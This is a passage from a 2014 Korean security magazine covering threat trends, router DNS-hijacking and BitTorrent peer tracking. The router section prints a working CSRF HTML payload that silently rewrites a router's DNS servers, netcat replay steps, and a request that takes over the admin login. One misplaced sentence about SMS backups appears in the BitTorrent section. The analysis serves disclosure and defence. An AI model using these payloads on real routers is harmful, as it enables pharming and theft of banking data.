될 수 있다. 상반기가 채 지나기도 전에, 6건이나 되는 OpenSSl 라
이브러리 취약점들이 추가적으로 발표되었다. 웹, 이메일, 메신저 및
VPn(Vritual Private network)과 같은 광범위한 애플리케이션에 보
안 적용을 위해 사용한 라이브러리가 오히려 사용자 및 보안 관계자
들의 심장을 바짝 긴장하게 했던 사건이다.
두 번째 취약점은 아파치(Apache) 웹 서버를 공격할 수 있는 아파치
스트러츠(Apache Struts) 보안 우회 취약점(CVE-2014-0094)이다.
자바 EE(Java EE) 웹 애플리케이션 개발을 위해 설치되는 스트러츠
(Struts) 프레임워크 상의 문제로, 정상적인 서비스 운영을 방해하고
공격자가 원하는 코드를 수행할 수 있는 위험이 존재한다. 해당 프레
임워크 상의 취약점 또한 이미 여러 차례 발표된 바 있다. 이처럼 상
반기에는 클라이언트 시스템을 주로 공격하는 현재 트렌드 속에서 주
목할 만한 서버 공격 취약점이 발생했으며, 보안을 위해 적용한 방어
막도 잘못 사용할 경우 더 큰 위협이 될 수 있다는 점을 상기시켰다.
스미싱 악성 앱의 고도화
스미싱 악성 앱은 SMS(단문문자서비스)에 포함된 URl 형태로 유포된
다. 초기에는 SMS에 포함된 URl에 접속할 경우 앱이 다운로드 되는
단순한 형태에서, 접속한 클라이언트가 모바일 단말기일 경우만 악성
앱을 다운로드 받을 수 있도록 진화했다. 특히 정교한 피싱 사이트를
제작해 사용자를 속이는 방법도 확인되었으며, 캡챠코드(CAPTCHA)
를 도입한 경우도 확인되었다.
배포 방법과 기능적인 면에서도 많은 변화가 있다. 초기 스미싱 악성
코드는 C&C 서버의 주소(URl 또는 iP)가 내부에 하드코딩 되어 있었
으며 HTTP를 통해서만 명령을 전달 받은 반면 최근 확인된 스미싱 악
성코드는 SnS의 댓글, SMS, XMPP(인스턴트메신저(iM)를 위한 국제
표준 규격) 등 다양한 방법으로 C&C 서버로부터 명령을 전달 받는 것
으로 진화하고 있다.
스미싱 악성코드, 소액결제에서 스마트폰 뱅킹으로 공격 집중
2014년 이전까지 발견된 국내 스미싱 악성코드는 휴대전화 인증방식
을 이용하는 소액결제 또는 스마트폰 뱅킹을 공격 대상으로 삼는 두
가지 형태로 발견되었다. 그러나 2014년 초부터 최근까지, 소액결제
를 노리는 악성코드는 더 이상 발견되지 않고 있다. 소액결제에 이용
되는 휴대전화 인증 절차가 강화됨에 따라 악성코드 제작자들이 스마
트폰 뱅킹으로 공격 대상을 집중한 것으로 보여진다. 최근 발견되는
인터넷 뱅킹 정보 탈취 악성 앱은 가짜 은행 앱을 다운로드 하는 다운
로더와 다운로드되는 가짜 은행 앱들로 구성된다. 설치되는 가짜 은행
앱은 아이콘과 화면구성까지 실제 은행 앱과 매우 흡사하며 사용자가
입력한 계좌번호, 계좌 비밀번호, 보안카드 등 금융거래에 필요한 정
보와 기기에 저장된 공인인증서를 탈취한다.
특정 대상을 감시하는 스파이 앱 증가
2014년 상반기에는 과거 2~3년 전과 유사하게 불특정 다수를 대상으
로 개인정보를 유출하는 스미싱 악성코드가 꾸준히 증가했는데 주로
택배, 차량단속적발, 등기, 예비군 훈련 등의 내용으로 위장해 전파됐
다. 그러나 최근엔 특정 대상의 통화내용, 문자, 사진, 인터넷 검색기
록, GPS 정보 등을 실시간으로 엿볼 수 있는 ‘스파이 앱’이 급격하게
증가하고 있다. 이 스파이 앱은 상용 앱으로 제작사 홈페이지에 접속
하면 설치방법과 자세한 기능들을 확인할 수 있다. 앱의 이용을 위해
한 달 이용료 3만원 ~ 10만원을 결제하면 구매자 이메일을 통해 다운
로드 받을 수 있다. 앱의 유포는 특정 피해자의 스마트폰에 직접 설치
하거나 문자, 메일, 메시지 등으로 링크를 보내 설치를 유도하는 방법
이 사용되고 있다. 스파이 앱은 자녀들의 비행이나 배우자의 외도를
감시하는 것이 상대적으로 쉬운 만큼 앞으로도 지속적으로 증가할 것
으로 예상된다.
2014년 하반기 보안 예측
스미싱의 증가 및 고도화
인터넷 뱅킹을 통한 금융 거래나 결제를 위해 필요한 개인 정보 및 금
융 정보를 탈취하는 스미싱 기법이 보다 더 교묘해질 것이다. 일반 사
용자들이 의심 없이 악성 앱을 설치하도록 사회공학적 기법을 이용한
문구를 사용하거나 정상 서비스와 구분이 어려울 만큼 정교한 형태의
피싱 사이트를 구성할 가능성이 높다. 보안 제품의 진단을 회피하기
위한 다양한 시도 역시 지속될 것이다. 또한 거듭되는 개인 정보 유출
및 이미 악성 앱에 감염된 사용자의 단말기에 저장된 전화번호부가
상당수 유출되어 이를 활용한 스미싱 또한 더욱 증가할 것으로 예상
된다.
하이브리드 악성코드 증가
스마트폰 사용자는 충전이나 데이터 교환 등을 위하여 PC와 자주 연
결하게 되는데 이를 악용하여 중요한 데이터를 유출하거나 추가로 악
성코드를 설치하는 등의 하이브리드 악성코드 및 악성 앱이 증가할
것으로 보인다. 특히 스마트폰에는 개인 정보, 금융 거래에 필요한 각
종 정보, 기업 정보, 사생활 정보 등 금전적으로 이용 가치가 높은 데
이터가 많이 저장되어 있어 PC 감염을 통해 이에 연결되는 스마트폰
까지 함께 감염시켜 좀더 효과적으로 중요 정보를 유출하려는 시도가
증가할 것으로 예상된다.
모바일 랜섬웨어의 위협
모바일 랜섬웨어는 감염된 스마트폰의 SD카드에 있는 모든 데이터를
암호화 시킨다. 매우 높은 수준의 암호화 알고리즘을 사용하기 때문에
사실상 악성 앱 제작자의 복호화 키 말고는 해제시킬 방법이 없다. 모
바일 랜섬웨어에 감염되면 사진, 동영상, 음악, 영화, 문서, 앱 데이터
파일들이 모두 암호화 되어 쓸 수 없게 된다. 악성 앱 제작자는 이런
파일들을 인질로 삼은 후 사용자에게 돈을 요구한다. 최초로 발견된
모바일 랜섬웨어는 우크라이나 사용자를 노리고 제작되었다. 우리나
라처럼 스마트폰과 모바일 뱅킹이 발달한 환경에서 모바일 랜섬웨어
는 더 치명적으로 작용할 수 있다. 랜섬웨어에 감염된 상태에서 섣불
리 모바일 뱅킹을 이용하여 돈을 이체하려다가 오히려 뱅킹 계정마저
탈취당해 더 큰 피해를 입을 수 있기 때문이다. 앞으로 우리나라 모바
일 사용자를 목표로 한 모바일 랜섬웨어와 뱅킹 계정 탈취 악성 앱이
결합된 형태의 새로운 위협이 발생할 것으로 예상된다.
악성코드에 의한 전자금융사기 수법의 다양화
공격자가 사용자의 금융정보를 탈취하는 최종 목적은 사용자의 예금
갈취이다. 이를 위해 악성코드 제작자는 지금까지 피싱, 메모리 해킹,
13
호스트(hosts 또는 hosts.ics) 파일 변조 그리고 공유기 DnS 설정 변
경, 스미싱 등 다양한 방법을 사용해 왔다. 향후 악성코드 유포방법에
있어서 지금보다 더 사용자가 인지하기 어려운 방법(정상 프로그램의
업데이트 파일 변조 등)을 사용할 가능성이 높다. 하지만 악성코드의
전자금융사기 수법은 지금과 크게 다르진 않을 것이며, 호스트 파일
변조가 가장 많이 사용될 것으로 보인다.
다양해지는 APT 표적 공격 기법
호기심을 자극하는 이메일로 특정 대상을 공격하는 스피어피싱은 올
하반기에도 지속될 것으로 보인다. 이러한 사회공학적 기법에 인천 아
시안게임이나 북한 이슈 등이 악용될 수 있다. 그리고 해킹된 웹사이
트에 접속하면 제로데이 취약점을 통해 악성코드를 감염시키는 워터
링홀(Watering Hole) 기법도 사용될 가능성이 있다. 최근에 발견된
OpenSSl 취약점인 하트블리드(HeartBleed)처럼 오픈소스의 취약점
을 이용한 공격도 가능하다. 공격 대상도 금융기관 및 일반 기업으로
확대되고 있는 추세이므로, 기업의 경제적 손실이나 기밀 유출 등에
항상 대비해야 한다.
IoT 보안 문제
사물인터넷 사용이 증가하면서 사물인터넷의 보안 문제도 계속 발생
할 것으로 보인다. 특히 업계에서 사물인터넷의 표준화 작업을 시도하
고 있는데 표준화가 성공하고 보안에 취약한 플랫폼이 선정된다면 앞
으로 큰 재난이 발생할 수 있다. 하반기에 바로 이런 일이 발생하지는
않겠지만 사물인터넷의 보안 문제는 보급과 보안 정도에 따라 큰 문
제가 될 가능성이 높다.
개발사 및 콘텐츠 전송 네트워크 업체 해킹
올 하반기에는 개발사 및 콘텐츠 전송 네트워크(CDn) 업체를 해킹하
려는 시도가 증가할 것으로 예상된다. 많은 사람들이 개발사에서 제공
하는 소프트웨어를 신뢰하지만 보안에 취약한 개발사들이 존재한다.
또 CDn 업체를 해킹해 업로드 된 파일을 악성코드로 교체할 경우 개
발사에서 보안을 철저히 해도 악성코드에 감염된 프로그램이 고객에
게 배포될 수 있다. 따라서 개발사와 콘텐츠 전송 네트워크 업체의 보
안 강화가 필요하다.
국가간 사이버 분쟁 심화
최근 몇 년 동안 여러 주요 국가는 특정국에서 사이버 첩보와 공격을
하고 있다고 주장하고 구체적인 증거를 내놓기도 했다. 미국 정부는
자국에서 사이버 스파이 행위를 한 중국인을 기소하고 용의자를 검거
하기도 했다. 중국 정부는 미국 운영체계와 보안 제품의 사용을 중지
혹은 검토 하고 있다. 앞으로 이런 국가간 사이버 분쟁은 계속될 것으
로 보인다.
1414
유•무선 공유기를 이용한 DNS 변조 공격 분석
T h R E aT a N a ly S i S
전격 해부! 공유기 DnS 변조 공격의 실체
공유기 해킹
지난 5월, 국내 주요 포털 사이트에 접속하면 가짜 은행 사이트로 접속되는 사례가 발생했다. 이는 사용자의 공유기가 해킹된 것으로,
공유기의 DNS 주소를 변경해 사용자들을 피싱 사이트나 파밍 사이트로 유도하는 공격이다. 공유기의 DNS가 변조된 경우에는 사용
자들이 정상적인 주소를 입력하더라도 악성 사이트로 이동하게 된다.
최근 공유기를 사용하는 이용자들이 늘어남에 따라 이를 노리는 공격 또한 증가하고 있는 추세다. 금융감독원에 따르면 공유기의
DNS 주소 변조 공격으로 1,691명의 이름과 주민등록번호, 휴대전화번호, 거래은행명, 계좌번호, 계좌비밀번호, 보안카드 번호 등이
유출됐다. 이 글에서는 실제 국내 주요 공유기를 대상으로 공유기 DNS 변조 공격 시나리오를 살펴본다.
최근 유•무선 인터넷 공유기에 설정된 DnS(Domain name Server)
주소를 변조해 피싱 사이트로 유도하는 범죄가 발생하고 있다. 일반적
으로 공유기 DnS 변조를 이용한 공격 방식은 [그림 1]과 같다.
공유기 DNS 공격 시나리오
1. CSRF 취약점을 이용한 DNS 변조
공유기는 기본적으로 외부에서 접근하지 못하도록 되어 있기 때문에
DnS 변조 공격을 하기 위해 공격자들은 CSRF(Cross-Site Request
Forgery) 취약점을 이용한다.
[그림 1] 공유기 DNS 변조를 이용한 공격
CSRF (Cross-Site Request Forgery)
사이트 간 요청 위조(또는 크로스 사이트 요청 위조, 약칭 CSRF 또는
XSRF)는 웹사이트 취약점의 공격중 하나로, 사용자가 자신의 의지와
는 무관하게 공격자가 의도한 행위(수정, 삭제, 등록 등)를 특정 웹사이
트에 요청하게 하는 공격을 말한다.
사이트 간 스크립팅(XSS)을 이용한 공격이 사용자가 특정 웹사이트를
신용하는 점을 노린 것이라면, 사이트간 요청 위조는 특정 웹사이트가
사용자의 웹 브라우저를 신용하는 상태를 노린 것이다. 즉, 일단 사용
자가 웹사이트에 로그인한 상태에서 사이트간 요청 위조 공격 코드가
삽입된 페이지를 열면 이후에는 사용자의 행동과 관계 없이 사용자의
웹 브라우저와 공격 대상 웹사이트 간의 상호작용이 이루어진다. (공격
자의 의도에 따라 제 3의 웹사이트가 추가될 수도 있다.)
*출처: 위키피디아
15
[그림 2] CSRF HTML 코드 예시
[그림 3] 공유기 접속 관리 화면 예시
<html><head></head><body><img src="#" onerror=location.replace("http://xxx.xxx.xxx.xxx/cgi-bin/timepro.cgi?tmenu=netconf&smenu=wansetup&act=save&wan=wan1&ifname=eth1&wan_type=dynamic&allow_private= ....... 중략.......... &fdns_static3=&fdns_static4=&sdns_static1=&sdns_static2=&sdns_static3=&sdns_static4=&mtu.static.eth1=1500") ></body></html>
또는 <html><head></head><body><img src="#" onmouseover=location.replace("http://xxx.xxx.xxx.xxx/cgi-bin/timepro.cgi?tmenu=netconf&smenu=wansetup&act=save&wan=wan1&ifname=eth1&wan_type=dynamic&allow_private=on& ..... 중략 ..... &fdns_static1=&fdns_static2=&fdns_static3=&fdns_static4=&sdns_static1=&sdns_static2=&sdns_static3=&sdns_static4=&mtu.static.eth1=1500") ></body></html>
DnS 변조와 관련된 간단한 CSRF HTMl 코드는 다음과 같다.
[그림 2]의 HTMl이 실행되면 이미지 파일을 로드할 수 없도록 에러
를 발생시켜 onerror 스크립트가 실행되면 공유기의 DnS 설정 변경
을 유도하는 패킷을 발생하도록 한다. 해당 페이지가 iframe 형태로
특정 사이트에 삽입되어 있거나 사용자에게 해당 HMl의 접속을 유도
함으로써 DnS 변조가 가능하다.
2. 외부 접속 공격 시나리오
[그림 3]은 국내 모 업체 공유기의 접속 관리 화면으로, 공유기의 원
격 관리 포트 사용이 가능하다. 기본(Default) 설정은 해당 기능을 사
용하지 않는 것으로 되어 있으며, 포트 또한 특정 값으로 정해져 있지
않다. 하지만 간단한 Ping 프로그램 및 포트 스캔(Port Scan)을 이용
해 해당 포트 값을 얻을 수 있다.
해당 공유기 업체의 경우, 제조사에서 DDnS(Dynamic DnS) 서비스
를 제공한다. 이를 통해 생성되는 DDnS 주소는 문자열.xxxxxx.org의
형태를 갖는다. BruteForce를 이용해 해당 주소가 DDnS 서비스를
사용하는지의 여부를 확인할 수 있다.
[그림 4] Ping 명령으로 DDNS 이용 공유기 확인
해당 DDnS가 할당된 특정 문자열(예: a.xxxxx.org)이 있는 경우
Ping 명령을 이용해 이를 확인할 수 있다. 외부 접속이 허용되는 옵
션이 있는 경우, 포트 스캔을 이용해 해당 포트로 접속 가능한 포트를
선정하고 DnS 변조 공격에 사용할 수 있는 패킷을 전송하여 응답으
로 200 OK 값을 받게 되면 공격에 성공한다. 단, 외부 접속 옵션이 허
용되어 있으면서 방화벽 설정이 열려 있다는 가정 하에 발생할 수 있
는 시나리오다.
공유기 DNS 변조 공격 분석
국내 모 업체의 각기 다른 유•무선 공유기 3종을 테스트한 결과, 동일
한 CGi 및 매개변수를 사용하는 것을 확인하였다. 다음은 해당 공유기
들을 이용해 테스트 공격을 수행하여 단계별로 분석한 내용이다.
1. 공격 패킷 분석
우선 해당 공유기의 DnS 변경 요청 시 발생하는 패킷을 살펴보자.
[그림 5] DNS 변경 시 발생하는 패킷
[그림 5]는 크롬(Chrome) 웹브라우저에서 해당 공유기에 접속 후
DnS 주소를 변경하는 패킷을 전송할 경우 발생하는 HTTP 통신 내용
이다. 해당 통신과 관련된 파라미터의 내용은 [그림 6]과 같다.
[그림 6] HTTP 통신 파라미터
16
[그림 6]에서 빨간색으로 표시된 부분이 주목해야 할 항목들로, 이들
인자의 뜻은 다음과 같다.
해당 인자로 구성된 패킷이 단말기에 연결된 공유기로 전송될 경우
패킷에 설정된 파라미터에 따라 주 DnS 서버 및 보조 DnS 서버의 값
이 변경된다.
공유기 비밀번호가 설정되어 있지 않은 경우, 아래와 같은 짧은 URl
을 실행하기만 해도 공유기의 DnS가 변경되는 것을 확인할 수 있다.
2. Netcat을 이용한 확인
netCat을 사용하기에 앞서 전송되는 패킷을 확인하기 위해 프록시
툴인 Burp Suite를 이용하여 패킷을 확인해보자.
패킷은 [그림 8]과 같은 형태로 발송되며, 이 내용을 그대로 복사하여
netCat으로 요청한다. 요청 내용은 [그림 9]와 같다.
dns_dynamic_ch : 수동 DnS 서버 설정을 하겠다는 표시
fdns_dynamic1~4 : 기본 DnS 서버의 1~4 값 ex)xx.xx.xx.xx
sdns_dynamic1~4 : 보조 DnS 서버의 1~4 값 ex)xx.xx.xx.xx
http://19*.***.*.*/***-bin/timepro.cgi?tmenu=netconf&smen
u=wansetup&act=save&wan=wan1&ifname=eth1.......... (생략)
[그림 7] 패킷 전송 이후 공유기의 DNS 서버 변조 화면
[그림 8] Burp Suite를 이용한 패킷 확인
[그림 9] NetCat을 이용한 공유기 DNS 변경 패킷 전송
해당 요청이 전송되면 [그림 10]과 같이 공격 완료 후 화면에 나타낼
HTMl 코드를 받아오는 것을 확인할 수 있다.
3. 어드민(Admin) 계정 변경
[그림 11]의 데이터를 netCat으로 요청할 경우, 기존에 관리자
(Admin) 비밀번호가 없으면 공격자는 임의로 iD와 비밀번호를 변경
한다. 이 경우 피해자는 iD와 패스워드를 알 수 없게 되므로 공유기를
리셋(Reset)해야만 접근이 가능하다. 리셋을 하지 않으면 관리자 페이
지에 접근이 불가능하기 때문에 DnS 변조 여부 또한 확인할 수 없다.
사용자가 iD와 비밀번호를 설정해두었을 경우에는 Auth 항목이 추가
된다.
[그림 12] ID/비밀번호 삽입 후 Auth 항목이 추가된 화면
[그림 10] 공격 성공 후 DNS에서 전송하는 HTML 코드
[그림 11] 어드민 계정 변경 요청 포스트(Post) 내용
POST /xxxx/xxxx.cgi HTTP/1.1Accept: text/html, application/xhtml+xml, */*R e f e r e r : h t t p : / / x x x . x x x x . x x x x . x x x / x x x x / x x x x x x .cgi?tmenu=sysconf&smenu=loginAccept-language: ko-KRUser-Agent: Mozilla/5.0 (Windows nT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateProxy-Connection: Keep-AliveContent-length: 96DnT: 1Host: xxx.xxx.xxx.xxxPragma: no-cache
t m e n u = s y s c o n f & s m e n u = l o g i n & a c t = s a v e & n e w _l o g i n = x x x x x x x x & n e w _ p a s s w d = x x x x x x x x x x & c o n f i r m _passwd=xxxxxxxxxx
이때 추가되는 Authorization 패킷은 ‘Base64’로 iD:Password의 값
을 갖는다.
17
[그림 13] Base64 Decoding을 이용한 Auth 복호화 화면
펌웨어 업데이트 등 사용자 주의가 최우선
최근 유•무선 공유기를 노리는 공격이 증가함에 따라 이에 대응하기
위한 공유기 제조사 및 보안 업체들의 움직임이 발 빠르게 이어지고
있다. 그러나 이러한 공격을 예방하기 위해서는 무엇보다 공유기 사용
자의 주의가 필요하다. ▲공유기의 펌웨어를 최신의 상태로 유지하는
것이 기본이자 가장 중요하며 ▲관리자 iD 및 비밀번호를 미리 설정
해두고 ▲가급적이면 공유기의 외부 접근을 허용하지 않는 것으로 설
정하는 것이 바람직하다. 또한 최신 무선 공유기는 대부분 공유기 자
체에 VPn 기능이 탑재되어 있다. 잠재적인 위협을 방지하기 위해서는
VPn 기능을 사용하지 않는 것을 권장한다. 무선 공유기의 비밀번호를
설정하는 것도 잊지 말아야 한다.
18
T E C h R E p O R T bitTorrent analysis
P2P 기술의 그림자, 불법 파일 공유를 막아라
1부_BitTorrent 기초 분석
P2P는 인터넷을 통한 파일 공유 기술로, 다수의 클라이언트 간에 파일을 공유할 때 매우 유용하게 사용되는 기술이다. 그러나 현재
P2P 기술의 장점인 뛰어난 성능과 빠른 속도가 파일의 불법 공유에 악용되면서 지적 재산권 침해 등 사회적 문제가 되고 있다. 기존
에는 P2P 서버를 중지시킴으로써 파일의 불법 공유 확산을 차단할 수 있었으나 최근 서버를 필요로 하지 않는 새로운 방식의 P2P
기술이 등장하면서 P2P 서버를 중지시키는 것만으로는 파일의 불법 공유를 막기 어렵게 되었다. 파일의 불법 공유를 막기 위해 공유
자들에 대한 직접적인 제재가 필요한 시기가 된 것이다.
‘월간 안’에서는 2회에 걸쳐 새로운 방식의 P2P 기술 중 가장 활발하게 이용되고 있는 비트토렌트(BitTorrent)에 대해 알아보고 불법
파일 공유에 참여한 이들의 정보를 확보할 수 있는 방안을 살펴보고자 한다.
<연재 목차>
1부_BitTorrent 기초 분석(이번 호)
2부_BitTorrent, 공유 과정 실전 분석(2014년 9월 호)
‘저작물’이란 어떤 아이디어를 독자적으로 표현한 창작물을 말한다.
지적 재산권은 저작자의 저작물 창조에 대한 의지 및 생산력 증진을
위해 저작자에게 주어지는 권리이다. 그러므로 저작물을 저작자의 동
의 없이 업로드 할 경우, 이는 저작자의 권리 중 복제권과 전송권을
침해하는 행위이며 이를 다운로드하는 것은 저작자의 복제권을 침해
하는 행위이다. 저작권법 제 136조에 의하면, 저작물을 무단으로 복제
하여 영리 행위를 한 경우 5년 이하의 징역 또는 5천만원 이하의 벌금
에 처하거나 이를 병과할 수 있다.
과거에 P2P를 통해 불법 공유가 발생한 경우, 법원은 P2P 서비스 제
공자, 사이트 운영자들에게 기여책임 및 대위책임이 있다고 판결하
였다. 이에 대한 처벌로 해당 사이트를 폐쇄하고 서비스 제공을 중
지하도록 명령하였다. 그러나 최근 많이 사용되고 있는 비트토렌트
(BitTorrent)는 기존의 P2P와 구조가 다르기 때문에 기존 판결이 적
용되기 어려운 형태다. 그러다 보니 비트토렌트를 이용한 파일의 불법
공유는 지속적으로 늘어나는 추세이다. 이 글에서 살펴볼 안드로이드
기반 스마트폰의 문자메시지는 백업 기능으로 데이터 추출이 가능하
19
므로, 이를 이용하여 문자메시지 데이터베이스를 추출하여 복구 과정
을 수행해본다.
P2P의 진화
최신 P2P 프로그램인 비트토렌트를 이해하기 위해서는 먼저 P2P가
어떻게 진화해왔는지 살펴볼 필요가 있다. P2P(Peer-to-Peer)는 개별
클라이언트들의 참여로 구성되는 통신망을 구현하는 기술이다. P2P
기술은 통신에 참여하는 각 클라이언트들이 데이터를 효율적으로 빠
르게 주고받을 수 있는 방향으로 발전해왔다.
P2P의 유형은 크게 1세대 P2P ~ 4세대 P2P로 나뉜다. 1세대 P2P는
‘중앙 서버-다수의 클라이언트’ 형태로 구성되어 있다. 중앙 서버에서
는 각 클라이언트들에 대한 정보를 가지고 있으며, 이 정보를 클라이
언트들에게 제공함으로써 클라이언트 간에 원활한 통신을 가능하게
한다. 냅스터(napster), 소리바다(soribada) 등 mp3 파일 공유 프로
그램이 대표적인 1세대 P2P라 할 수 있다. 1세대 P2P의 네트워크는
서버 상태에 의존적인 구조이기 때문에 서버에 문제가 생길 경우 클
라이언트들은 원활하게 데이터를 공유할 수 없게 되는 단점이 있다.
3세대 P2P부터는 파일을 일정한 단위의 조각으로 나누고 클라이언
트간에 서로 필요한 조각을 주고받는 형태로 공유가 이루어지게 되
었다. 이러한 방식을 통해 데이터의 공유 속도가 향상되었으며 클라
이언트간에 데이터가 더욱 효율적으로 오갈 수 있게 되었다. 당나귀
(edonkey), 이뮬(eMule) 등이 3세대 P2P라 할 수 있다.
[그림 1] 1세대 P2P 냅스터와 소리바다
[그림 2] 2세대 P2P 프리넷과 그누텔라
[그림 3] 3세대 P2P 당나귀(edonkey)와 이뮬
[그림 4] 비트토렌트 로고
[그림 5] 비트토렌트 네트워크 구조
이후 등장한 2세대 P2P는 중앙 서버의 역할을 축소하거나 제거하고,
클라이언트들 간에 네트워크를 형성하여 데이터의 공유를 가능하게
하는 형태로 발전하였다. 프리넷(Freenet), 그누텔라(Gnutella) 등이
이에 속한다.
4세대 P2P로 불리는 비트토렌트는 앞선 P2P들의 특징을 모두 포함
하고 있다. 서버와 유사한 기능을 제공하는 트래커(Tracker)도 존재한
다. 트래커는 다른 클라이언트에 대한 정보 및 공유되는 데이터에 대
한 간단한 정보만을 보유하고 있으며 클라이언트들이 데이터 공유에
참여하는 과정에서 트래커에 필요한 정보를 HTTP GET 형태로 요청
하면 그에 대한 응답으로 정보를 보내준다. 클라이언트는 트래커로부
터 전달받은 타 클라이언트에 대한 정보를 토대로 데이터 공유 네트
워크에 참여한다.
그러나 트래커가 비트토렌트를 통한 데이터 공유의 필수 요소는 아니
다. 비트토렌트는 DHT라는 내부 알고리즘을 통해 데이터 공유에 참
여하고 있는 피어(Peer, 즉 클라이언트)들로부터 직접 피어들에 대한
정보와 네트워크에 대한 정보를 제공받음으로써 공유 네트워크에 속
하여 데이터를 공유하는 것이 가능하다.
하이브리드 P2P, 비트토렌트
비트토렌트는 공유 파일을 일정한 크기의 조각인 Piece로 분할하고
각 피어들간에 Piece를 주고받게 함으로써 빠르고 효율적으로 파일이
공유될 수 있게 하였다. 또한 각 피어가 보유하고 있는 Piece 목록 정
보를 네트워크 상에서 공유하게 함으로써 각 피어들이 원하는 Piece
를 빠르게 찾아갈 수 있게 하였다.
토렌트 파일 분석
토렌트(Torrent) 파일은 공유 대상이 되는 파일의 이름, 파일 전체 크
기, 파일의 해시값(hash value), 트래커, Piece 등에 대한 정보를 갖
고 있으며 그 내용은 Bencoding 형태로 구성되어 있다. Bencoding
은 바이너리 인코딩(Binary encoding)의 약자로, 비트토렌트 관련 파
일에서 데이터를 저장하거나 공유 네트워크 상에서 정보를 주고 받을
때 사용하는 형식이다. Bencoding의 구조는 [표 1]과 같다.
20
유형 설명 구조 예시
Strings 문자열 [길이]:[데이터] 7:network
Integers 숫자 i[숫자]e i3e
Lists 다수l[strings or ingegers]e
l8:advanced7:networke
Dictionaries Key-value d[keys][values]ed3:onei1e3:twoi2e5:threei3e4:fouri4ee
[표 1] Bencoding 구조
[표 2] 토렌트 파일의 정보
토렌트 파일은 다음의 정보들을 Bencoding의 디렉터리(Directory)
형식에 맞춰 갖고 있다.
토렌트 파일을 헥사 뷰어로 열어보면 다음의 그림들과 같이 Bencod-
ing 형태로 다양한 정보들이 들어있음을 확인할 수 있다.
비트토렌트 파일 공유자 정보 확보 방법
비트토렌트 클라이언트 프로그램에서 토렌트 파일을 실행하면 공유
가 시작된다. [그림 9]는 비트토렌트 클라이언트 프로그램 중 하나인
uTorrent에서 테스트용 토렌트 파일을 실행시켰을 때의 화면이다.
Key 필수 여부 설명
Info O 공유 파일에 대한 정보를 dictionary 포맷으로 가지고 있음
-length O 파일의 총 크기
-md5sum X 파일에 대한 MD5 해시값
-name O 파일 이름
-piece length O Piece의 크기 (일반적으로 256KB)
-pieces O 각 Piece들에 대한 SHA1 해시 값 목록)
files O공유 파일이 여러 개인 경우, Dictionaries ‘files’ 밑에 각
파일별로 length, md5sum, name 등의 정보가 담기게 됨
-path O공유 파일이 여러 개인 경우, 각 파일의 이름은
Dictionaries ‘files’ 밑의 ‘path’ 부분에 담기게 됨
Announce O 트래커 목록
Announce-list
X 백업 트래커(Backup Tracker) 목록
Create date X 토렌트 파일 생성 시각 (Unix epoch format)
Comment X 코멘트 (토렌트 파일 생성자가 자유롭게 작성 가능)
Created by X토렌트 파일 생성에 이용된 프로그램 정보
(BitTorrent 클라이언트 프로그램 이름 및 버전 정보 등)
[그림 6] 토렌트 파일 예시1 (announce, announce-list)
[그림 8] 토렌트 파일 예시3 (piece length, pieces)
[그림 9] 파일 공유가 진행 중인 uTorrent 프로그램 화면
[그림 7] 토렌트 파일 예시2
(comment, created by, createdate, files, length, path)
[그림 9]의 프로그램 화면 우측 하단에서 현재 실시간으로 파일의
Piece를 주고받는 피어들에 대한 정보를 확인할 수 있다. [그림 9]의
예로 든 화면에서는 피어의 수가 5개 정도로 보이지만 실제로 파일
공유 네트워크에는 훨씬 더 많은 피어들이 존재하고 있다. 이들 피어
에 대한 정보는 두 가지 방법을 통해 확인할 수 있다.
1. 트래커로부터 전달 받은 HTTP Response 패킷 분석
트래커는 각 파일 별로 공유 네트워크에 참여하고 있는 피어들에 대
한 목록을 가지고 있다. 따라서 새로운 피어가 해당 목록을 HTTP
GET 형태로 요청하면 이에 대한 응답으로 현재 공유에 참여하고 있
는 피어들에 대한 목록을 보내준다. 피어들에 대한 정보를 갖고 있는
트래커에 공유되고 있는 파일의 해시 정보에 대해 HTTP GET 요청을
보내고, 이에 대한 응답으로 받은 HTTP Response 패킷에서 해당 파
일을 공유하고 있는 피어들에 대한 정보를 추출하는 것이다.
21
[그림 10] 피어 목록 정보가 담긴 패킷 (트래커로부터 전달받은 정보)
[그림 12] 피어 목록 정보가 담긴 패킷 (네트워크 상의 다른 피어로부터 전달받은 정보)
패킷의 데이터 부분에는 [그림 10]과 같은 형태로 피어들의 iP와 포
트 정보가 6바이트(byte)씩 연달아 들어있다. 따라서 HTTP 패킷의
Bencoding 영역 내에 키 ‘peers’가 존재할 경우 해당 키에 대응되는
value 부분으로부터 공유 네트워크를 구성하는 피어들에 대한 정보를
수집할 수 있다.
2. 피어로부터 전달받은 패킷 분석
피어들은 각 파일 공유 네트워크에 참여하고 있는 피어들에 대한 목록
을 가지고 있으면서 서로 보유하고 있는 피어 목록을 주고받음으로써
주기적으로 정보를 갱신한다. 구체적으로는, 피어가 다른 피어에게 관
심 파일의 해시값과 ‘get_peers’ 메시지가 담긴 UDP 패킷을 보내면
서 피어 목록을 요청하는 것이다. 해당 UDP 패킷을 받은 피어는 자신
이 보유하고 있는 피어들의 목록을 응답으로 보내준다.
패킷의 데이터 부분에는 [그림 12]와 같이 피어들의 iP와 포트 정보가
6바이트씩 연달아 들어있기 때문에 HTTP 패킷의 Bencoding 영역
내에 키 ‘values’가 존재할 경우, 해당 키에 대응되는 value 부분으로
부터 공유 네트워크를 구성하는 피어들에 대한 정보를 수집할 수 있다.
지금까지 대표적인 P2P 프로그램인 비트토렌트의 동작 방식을 살펴
보고 비트토렌트의 두 가지 패킷 유형을 분류해 Bencoding 영역에서
피어의 iP와 포트 정보를 추출함으로써 파일 공유에 참여한 사람들의
정보를 추출하는 방법을 알아보았다. 다음 호에서는 비트토렌트의 파
일 공유 과정과 관련 패킷에 대해 상세히 분석하고 파일 공유 참여 시
사용자의 PC에 남는 흔적을 분석하는 방법을 살펴보도록 하겠다.
[그림 11] ‘get_peers’ 메시지가 담긴 피어 목록 요청 패킷
<용어 정리>
1. BitTorrent 클라이언트 프로그램
- BitTorrent 기술을 이용하여 각 사용자들이 데이터의 공유가 가능하도록 도와주는
프로그램
- 자주 사용되는 프로그램으로 uTorrent, BitComet 등이 있음
2. Torrent 파일
- ‘.torrent’ 확장자를 갖는 Torrent 파일을 BitTorrent 클라이언트 프로그램에서 실행
함으로써 파일의 공유에 참여하는 것이 가능함
- Torrent 파일은 공유 대상이 되는 파일의 이름, 파일 전체 크기, 파일의 해시 값,
Tracker 등에 대한 정보를 가지고 있음
